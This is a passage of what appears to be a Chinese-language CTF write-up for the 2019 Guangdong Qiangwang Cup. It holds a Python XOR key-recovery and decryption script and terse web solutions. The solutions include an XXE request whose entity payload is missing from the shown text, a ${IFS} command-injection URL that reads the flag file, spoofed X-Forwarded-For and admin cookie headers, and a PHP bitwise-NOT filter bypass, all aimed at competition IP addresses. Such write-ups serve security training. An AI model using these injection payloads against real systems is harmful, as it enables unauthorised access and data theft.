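# scratch list of other candidate vectors as no-op expression statements;
# only these final assignments ever took effect, so they are hoisted here.
iv = [0xF7, 0x84, 0x4B, 0xE5, 0x61, 0x93, 0x7B, 0x98]
two =[0x45, 0x2F, 0xD1, 0xF4, 0xA9, 0xBE, 0x94, 0x90]

# Eight candidate alignments: slide an 8-byte window of the known plaintext
# one byte at a time from the end of `raw`.
for offset in range(8):
    print('--------------------')
    n = offset + 1
    raw_last = raw[-n-8:-n]  # 8-byte window ending n bytes before the end
    print(raw_last)
    print(pad(raw_last))
    raw_last = pad(raw_last)
    # NOTE(review): raw_last is always exactly 8 bytes here, so pad() appends
    # a whole extra block that the 8-byte key derivation below never reads.

    key = [ord(ch) for ch in raw_last]

    # key byte = two ^ iv ^ plaintext, the unique value the original's
    # 256-way search found for each position.
    t_key = [c ^ v ^ k for c, v, k in zip(two, iv, key)]

    print(t_key)

    # plaintext = previous block ^ key ^ ciphertext; binary mode plus a
    # with-block replace the text-mode handle the original never closed.
    flag = ''
    with open('flag.txt.encrypted', 'rb') as f:
        raw_iv = bytearray(f.read(8))
        for _ in range(24):
            enc = bytearray(f.read(8))
            flag += ''.join(chr(a ^ k ^ b) for a, k, b in zip(raw_iv, t_key, enc))
            raw_iv = enc

    print(flag)

exit()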

Web

XX

  • 源码泄漏 index.php~,Xxe 利用
POST /index.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 119.61.19.212:8083
Proxy-Connection: Keep-Alive
Pragma: no-cache
Content-Length: 225



]>

&xxe;
111`

ping

  • 利用ifs绕过空格,利用/flag绕过flag
http://119.61.19.212:8081/index.php?A=a;grep${IFS}fla${IFS}/fla*
2019广东强网杯_wp_第16张图片

小明拒绝

  • 头部加上
X-Forwarded-For: 127.0.0.1
Cookie: admin=1

php

  • 利用取反

生成取反的exp

即可

view-source:http://119.61.19.212:8082/index.php?code=(~%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98)();

找漏洞

  • 存在注入,可以读出信息
2019广东强网杯_wp_第17张图片
2019广东强网杯_wp_第18张图片
  • 密码明文
2019广东强网杯_wp_第19张图片
  • 模板注入,需要上传模板,由于没找到key,采用爆破的方式访问注入的页面
2019广东强网杯_wp_第20张图片

API

  • 扫描目录发现
2019广东强网杯_wp_第21张图片
  • 直接有flag
2019广东强网杯_wp_第22张图片
  • 常规思路应该是Api目录爆破file参数,读到hack.php文件代码,hack.php写文件
